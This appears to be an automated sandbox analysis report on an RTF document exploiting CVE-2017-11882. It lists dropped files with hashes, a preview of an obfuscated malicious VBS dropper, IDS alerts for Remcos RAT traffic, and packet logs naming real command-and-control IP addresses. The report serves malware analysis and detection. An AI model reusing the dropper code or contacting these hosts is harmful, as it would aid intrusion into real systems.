                        Preview:5.4.8.2.5.7.3.0.6.[.4.>.?.=.2.....?.2.3...8...%.5.4.).>././.9.0.|.@.%...4.8.4.?.,.2.%.].)...?.?.?._.+.#.'...2.,.;.[...!.8.>.>.#...%.1.4.`.$.0.>.=.].^.`.?.$.*.%.8.>.7.?.?.+.#.....&...^...<.$.=.%._.,...*.;.?.5.3...2.$.`.!.0.%.#...!.8.0.=.^.^.?.1.1._.@.@.(.^...@.`.%.%.$.3.[.!...`.).&.9...&.:.?.7...?.>.(.?.].%.>.4.'.(.&.5.?./.5.3...;.].3...;.@./.`.+...5.%._.,.[.8.^.&.?.>.8.0.>.3.[.^.5.2.>.#.8.%.7...(.|...:.~.6.3.$.(.:.?.?.&.(.0.4.3...#...?.;.....[.*.0.>._.9.,...).].,.$...<.<.|._.>.&.@.`.).;.&.$.|.?.).;.=.&.].7.?.?.,._.^.4.|.!.?.8./.].^.).^.+.,.5.....!.+.&.).....1...+...?.1.6.9.~.'.&.`.4.0.?.'.[.'.$...*.0.0.[.).].3.?.8.=.].,.&.?.+.#.(.?.`.?.7.4.;.].?.'.^.].*.;.#.@.3.<.'.2.7.>.|.`.|.`.?.,.,.2.;.].4.>.-.^.-.,.].@.;.!./.6.*.>.,.:.~.:.%.<.].).;.+...?.$.2.?.*...^.%.!.`.~.=.4.`.)...3.?.'.+.,.%.7.:./.6.=.@.+.@.~.2.0.!.#.].+.3.?.].^.=.).,.-.=.=.&.|./.~.#.~.6.^.:.'...#.3.-.%.%.@.*.4.?.'./.5.=.?.3.&.4.@.$.(.!.8.'.;.'.%.3.?.:...<.#.?.?.?.3.).6.?.)...-.5.#.?.0.7.9.)./.)._.|.7./.&.;...>.6.:.@./.].-.?.@.

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{679FD92C-7EF1-4A2F-ADE8-27F26CF6740E}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1024
                        Entropy (8bit):0.05390218305374581
                        Encrypted:false
                        SSDEEP:3:ol3lYdn:4Wn
                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                        Malicious:false
                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\bhv83A1.tmp

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x34a80619, page size 32768, DirtyShutdown, Windows version 6.1
                        Category:dropped
                        Size (bytes):21037056
                        Entropy (8bit):1.1392529298687848
                        Encrypted:false
                        SSDEEP:24576:TO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:TOEXs1LuHqqEXwPW+RHA6m1fN
                        MD5:C91EC8C784D828617FEB38B07575505A
                        SHA1:DD307115CBF128028F1BBEDBF473761B2A00761A
                        SHA-256:4B61AB3D23FAC5261E83C18A9ACCA1AFB5E50FF5E5FB04E0C91A38084A8F5620
                        SHA-512:9328B0E900082C1B8316B9C41ADD4FABF714088EE3424289640B5E1947D1E5492B9D3E9DE59AA40D3A874E2F454770ADEE8F4880B9937EBF1E3EB2C157751ABA
                        Malicious:false
                        Preview:4...... ........................u..............................;:...{..."...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\bhvB683.tmp

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x34a80619, page size 32768, DirtyShutdown, Windows version 6.1
                        Category:dropped
                        Size (bytes):21037056
                        Entropy (8bit):1.1390575415766635
                        Encrypted:false
                        SSDEEP:24576:QO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:QOEXs1LuHqqEXwPW+RHA6m1fN
                        MD5:3066E41B964B2F764A88A47A3C93F8E0
                        SHA1:78C6D7363694B23F49DBAA08F163A0A1557668F1
                        SHA-256:58045B75060FF67DEC99471B310283A64A10E50552CECBDB6B20273F48D68AB0
                        SHA-512:935C7089E5D6D09B2AFCD4F0B8E33F998186680DAE85A140F1B7051CB2C2535F759B1EBBC0DAA0472B949AE3574064EA226D2AE57EF3080BE2CA62F3EEC52245
                        Malicious:false
                        Preview:4...... ........................u..............................;:...{..."...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\h0yzbhl5.kki.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\jmjve4fk.y0d.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\mqun3wpm.4oj.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\muezvmgbhtns

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                        Category:dropped
                        Size (bytes):2
                        Entropy (8bit):1.0
                        Encrypted:false
                        SSDEEP:3:Qn:Qn
                        MD5:F3B25701FE362EC84616A93A45CE9998
                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                        Malicious:false
                        Preview:..

                        C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                        Category:dropped
                        Size (bytes):2
                        Entropy (8bit):1.0
                        Encrypted:false
                        SSDEEP:3:Qn:Qn
                        MD5:F3B25701FE362EC84616A93A45CE9998
                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                        Malicious:false
                        Preview:..

                        C:\Users\user\AppData\Local\Temp\yr3kmbrs.y0x.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.LNK

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:10 2023, mtime=Fri Aug 11 15:42:10 2023, atime=Thu Sep 26 07:32:58 2024, length=93195, window=hide
                        Category:dropped
                        Size (bytes):1239
                        Entropy (8bit):4.5374974454458945
                        Encrypted:false
                        SSDEEP:24:8u6/XToSQt42HCdOSQ5JemElTHCdOSQ/Dv3qmr57u:8u6/XT8vHCc4HC7u9u
                        MD5:4B04A3FDC971AB9EDF2A39965A8443C7
                        SHA1:D85E2A09A022D654A7C0F567F58687856ACFAFF5
                        SHA-256:0E2F6569EDCD5AB1746921ACC2E191E17FFD57520A5DB6980D96ED2284CF6F7E
                        SHA-512:3D868625A5F1CCBA8A5E503541981F22121C8159B9FF83AC921E6DF1E76B9E97667F16E10FF47E32EBCADF4A2EAD51453979A3B6E55FE8CABCB89112F70582A0
                        Malicious:false
                        Preview:L..................F.... .......r.......r....S.......l......................)....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....:Y.D..user.8......QK.X:Y.D*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..l..:Y D .SECURI~1.RTF..........WF..WF.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...3.1.1.7.7...1.4.9.6.8...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\549163\Users.user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf.R.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...3.1.1.7.7...1.4.9.6.8...r.t.f.........:..,.LB.)...Ag.............

                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:Generic INItialization configuration [folders]
                        Category:dropped
                        Size (bytes):145
                        Entropy (8bit):4.982424823001407
                        Encrypted:false
                        SSDEEP:3:H9rbcK+JiMWUmUcKm4P8bcK+JiMWUmUcKv:H9rwKNX3UwwKNX3Uj
                        MD5:33551BF8D0B74BD7D8C697A8B25E369F
                        SHA1:515882BF9CCBD85319126A3B1246F6F86BCE04F1
                        SHA-256:C539F861B66300B191DE750996793865031CF595199520F9FBF535A47E66E62A
                        SHA-512:261FC4501D9CC8C6E825AB2454CB062C4C25E1A725B38DD10FDAC20E433CDA1F88B6E17982D06AF33335CC67E85402BCE2D12B43EB01DCE4DBFA19ACB8DF6C75
                        Malicious:false
                        Preview:[misc]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.LNK=0..[folders]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.LNK=0..

                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.4797606462020307
                        Encrypted:false
                        SSDEEP:3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
                        MD5:EB62D355909FD3DD98A808A4D456667D
                        SHA1:71A4875D461DDDB4D9EFA05E2529D67E79E558C2
                        SHA-256:4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
                        SHA-512:542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
                        Malicious:false
                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                        C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS

                        Download File
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):242204
                        Entropy (8bit):3.7503849148647648
                        Encrypted:false
                        SSDEEP:3072:e6OFbCm2KNCDW+SIVq7+r7Gqrgt5pHGw/Wn8Sbgt86sRzkZNCQ7/EhPVFf0NCWl7:eQmY8IVr7GLWIF4zSbEhXOCWlIVpWB
                        MD5:23E413B982049B148C538D6CB7D3806D
                        SHA1:1A2242865CA56FC82CA987811E0BC6407A272B27
                        SHA-256:2004D59D558983F5D19B914B2B348F75443C81B6F2CF0C76F7735037D376CED1
                        SHA-512:6C8B319159EF4E20E19E3BAAA7357927F0D3E4C60AC2C4CAD0AFCAED04175A595CE0C417ED4556215B049841274F3B4BE67BD4E8B6D10F53C5E2FEB5304A6913
                        Malicious:true
                        Preview:..a.L.T.C.K.n.o.H.n.c.C.f.Z.T.d.d.o.i.J.c.P.P.c. .=. .".C.z.W.k.G.A.L.j.W.P.a.K.c.P.c.J.R.v.u.h.W.c.Z.".....u.c.G.c.e.Q.N.c.K.Z.j.c.L.Q.I.W.I.I.f.B.N.o.L. .=. .".P.I.o.K.W.z.j.f.W.A.b.W.G.o.q.K.N.h.A.W.L.L.B.".....a.o.Z.a.G.b.s.L.x.n.K.K.p.G.U.S.I.c.L.p.P.r.U. .=. .".Z.u.W.K.x.G.n.p.n.H.G.R.L.i.c.W.C.q.o.U.k.k.h.".....r.O.U.U.A.m.e.A.i.a.Z.a.p.C.G.G.p.T.W.G.K.L.W. .=. .".i.K.g.i.c.K.C.p.e.q.h.K.T.k.W.o.L.N.G.L.H.k.a.".....n.l.O.G.l.c.L.S.W.W.O.W.o.k.L.k.W.J.c.s.e.L.U. .=. .".W.K.c.c.L.U.K.W.o.c.j.f.O.K.a.L.p.Q.U.C.R.O.N.".....o.H.L.W.O.i.b.m.h.Z.s.z.R.B.K.L.U.i.L.c.W.i.J. .=. .".T.z.L.p.f.p.h.B.b.c.l.H.L.j.l.q.L.x.W.Z.b.P.z.".....W.s.d.U.L.z.p.p.W.L.K.k.G.L.G.x.W.L.z.u.h.i.a. .=. .".i.U.j.i.m.f.m.p.h.L.b.Q.N.g.C.e.K.N.k.b.W.v.A.".....K.s.W.a.m.h.K.z.p.k.b.i.f.W.W.o.K.W.b.d.W.x.z. .=. .".I.t.B.K.L.x.S.k.j.d.J.P.m.e.u.i.Z.R.L.G.W.u.h.".....i.d.l.r.l.z.U.m.G.C.U.o.z.b.i.o.c.z.P.L.m.k.N. .=. .".Z.G.c.c.G.f.h.e.Z.i.l.U.k.v.A.a.c.e.r.n.a.d.a.a.e.c.k.K.".....U.i.L.L.A.q.z.a.U.G.c.L.f.z.l.U.s.

                        C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.4797606462020307
                        Encrypted:false
                        SSDEEP:3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
                        MD5:EB62D355909FD3DD98A808A4D456667D
                        SHA1:71A4875D461DDDB4D9EFA05E2529D67E79E558C2
                        SHA-256:4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
                        SHA-512:542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
                        Malicious:false
                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                        Static File Info

                        General

                        File type:Rich Text Format data, version 1
                        Entropy (8bit):2.774175252993005
                        TrID:
                        • Rich Text Format (5005/1) 55.56%
                        • Rich Text Format (4004/1) 44.44%
                        File name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf
                        File size:93'195 bytes
                        MD5:9cb9142659aa46876659d869b522a616
                        SHA1:7704e37a8ec272ec3a8f24c2f56e8e0c0071a7fe
                        SHA256:d9c48d17fccf4c215621206bf43697a8e56120e21a6fe8669ec36a5be8e05a43
                        SHA512:438c3ee43f354ab3254b68354e3d2da1b7f736ec1104c4524d2d4a742c7de9762e47e759fae08c0c953026157a1b85f2610ebc57bb6065a727c044c67c9c6c44
                        SSDEEP:384:NLrP/UV6hlG7DGtLglDG93sdXUWdMBXF5iPFXX1ANp5d1k/L:90V6PGT0mUWab5iVX1Op5d2L
                        TLSH:B593BD9C874F44A5CB455337132A5E4506FDB33EB30551B639ACA7B037AE82E09A50BC
                        File Content Preview:{\rtf1..{\*\J7dtfvmz1CHtSfgPsmYXYi4D5mCAUvpEedNjtxXCwpGKyg1C6IOhynlFf3LimDTiwa6vKeYtcQay62cS9aE9j8yyO8MvMv9NxcoNEALVpdIiAs0boH4p6sEo2eHhUBNbTOXzteSQN8QUR}..{\3548257306[4>?=2..?23.8.%54)>//90|@%.484?,2%]).???_+#'.2,;[.!8>>#.%14`$0>=]^`?$*%8>7??+#..&.^.<$=

                        File Icon

                        Icon Hash:2764a3aaaeb7bdbf

                        Static RTF Info

                        Objects

                        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                        00000169Chno

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-09-26T10:33:12.763912+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11185.29.10.5280192.168.2.2249163TCP
                        2024-09-26T10:33:12.763912+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11185.29.10.5280192.168.2.2249163TCP
                        2024-09-26T10:33:16.344510+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249164192.210.150.2914645TCP
                        2024-09-26T10:33:18.064584+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249165192.210.150.2914645TCP
                        2024-09-26T10:33:18.153483+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249166178.237.33.5080TCP
                        2024-09-26T10:35:10.442136+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249167192.210.150.2914645TCP
                        2024-09-26T10:35:10.536458+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249168192.210.150.2914645TCP
                        2024-09-26T10:35:15.745754+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249169192.210.150.2914645TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 26, 2024 10:33:03.403548002 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:03.408587933 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:03.408767939 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:03.408983946 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:03.413779020 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.049181938 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.049241066 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.049274921 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.049307108 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.049341917 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.049446106 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.049446106 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.049446106 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.049446106 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.049446106 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.144798994 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.144856930 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.144913912 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.144912958 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.144912958 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.144948959 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.144979954 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.144984961 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.145025969 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.145032883 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.145060062 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.145076990 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.145076990 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.145092964 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.145126104 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.145127058 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.145150900 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.145158052 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.145184994 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.145196915 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.145210028 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.145256042 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.145328999 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.240777016 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.240816116 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.240866899 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.240890980 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.240899086 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.240932941 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.240962029 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.240962029 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.240962029 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.240988970 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.241018057 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.241039038 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.241044998 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.241095066 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.241689920 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.241748095 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.241760015 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.241776943 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.241801977 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.241825104 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.242198944 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.242225885 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.242270947 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.242316008 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.242425919 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.242460966 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.242491007 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.242494106 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.242512941 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.242526054 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.242543936 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.242563009 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.242578983 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.242618084 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.243437052 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.243469954 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.243499994 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.243501902 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.243520975 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.243555069 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.243556976 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.243587971 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.243604898 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.243643999 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.336577892 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.336648941 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.336692095 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.336719036 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.336719036 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.336744070 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.336759090 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.336777925 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.336800098 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.336812019 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.336843014 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.336846113 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.336863041 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.336883068 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.336893082 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.336941957 CEST4916180192.168.2.22185.29.10.52
                        Sep 26, 2024 10:33:04.337161064 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.337212086 CEST8049161185.29.10.52192.168.2.22
                        Sep 26, 2024 10:33:04.337224960 CEST4916180192.168.2.22185.29.10.52
